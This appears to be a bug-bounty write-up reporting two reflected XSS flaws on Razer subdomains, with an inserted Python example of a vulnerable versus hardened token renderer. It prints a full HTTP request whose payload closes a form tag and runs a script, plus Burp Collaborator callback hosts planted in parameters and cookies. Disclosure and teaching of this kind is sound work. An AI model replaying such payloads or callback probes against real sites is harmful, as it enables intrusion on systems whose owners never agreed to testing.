2 Reflected XSS In Razer

Mostafa
Nov 21, 2020

First of all, thanks for reading my first write-up on Medium.

My name is Mostafa. I am working as an information security engineer, and in my spare time I do some bug hunting.

I found 2 vulnerabilities in different subdomains of Razer.

The first one is a reflected XSS in (http://drivers.razersupport.com).

When I was searching for XSS, I looked at reflected params. I found that the CSRF token had been reflected and commented in the HTML response, so this is the first one: I just closed the form tag and wrote an XSS payload, and it was executed.

GET /index.php?_m=k2n4qnfei8t8yk2e7ua78c7m7dd41t.burpcollaborator.net&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131&_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131?_m=downloads&_a=viewdownload&downloaditemid=800&nav=0Quote%3AOriginally%2C76%2C168%2C11%2C131 → →"></form><h1><script>alert(document.domain)</script></h1> HTTP/1.1
Host: drivers.razersupport.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.google.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SWIFT_sessionid40=59cpx8mzpt0t559zefhsfxe7eykq8f.burpcollaborator.net; _gcl_au=1.1.291319320.1592845997; __utma=124197257.1459569068.1592845998.1592845998.1592845998.1; __utmc=124197257; __utmz=124197257.1592845998.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt=1; __utmb=124197257.1.10.1592845998; _ga=GA1.2.1459569068.1592845998; _gid=GA1.2.741943482.1592845999; __unam=c0300f2-172dd050e1d-36a23205-2; _dc_gtm_UA-33485401-2=1
Connection: close
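
An added example, not part of the original write-up: a Python sketch of the pattern described above, where a request-supplied token is echoed raw into a form attribute and an HTML comment, shown next to a hardened renderer and a check that reports where an inert marker is reflected. The field name `csrf`, both render functions and the marker are assumptions made for illustration.

```python
import html
import re
from html.parser import HTMLParser

MARKER = "zq7canary"        # constructed, inert marker
PROBE = MARKER + '"<>'      # same marker plus the characters that must be encoded

def render_vulnerable(token: str) -> str:
    # Hypothetical page: request value echoed raw in an attribute and a comment.
    return (f'<form method="post"><input type="hidden" name="csrf" value="{token}">'
            f'<!-- csrf={token} --></form>')

def render_hardened(token: str) -> str:
    # Allow-list the expected token shape, encode on output, drop the debug comment.
    if not re.fullmatch(r"[A-Za-z0-9]{1,64}", token):
        token = ""
    return (f'<form method="post"><input type="hidden" name="csrf" '
            f'value="{html.escape(token, quote=True)}"></form>')

class _Contexts(HTMLParser):
    """Records which HTML contexts contain the marker."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.found = set()

    def handle_starttag(self, tag, attrs):
        if any(MARKER in (value or "") for _, value in attrs):
            self.found.add("attribute")

    def handle_comment(self, data):
        if MARKER in data:
            self.found.add("comment")

    def handle_data(self, data):
        if MARKER in data:
            self.found.add("text")

def reflection_report(render) -> dict:
    """Render once with the inert marker to locate contexts, once with the probe
    to see whether quote and angle-bracket characters come back unencoded."""
    parser = _Contexts()
    parser.feed(render(MARKER))
    parser.close()
    return {"contexts": sorted(parser.found),
            "raw_metachars": PROBE in render(PROBE)}
```

Run as a regression test against a template, `raw_metachars` being true in any context means the value can terminate the surrounding attribute or tag.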

The second reflected XSS (auth.pay.razer.com)

Good advice: test all reflected inputs and don't use automation tools to find XSS.

All issues are mitigated.

Thanks
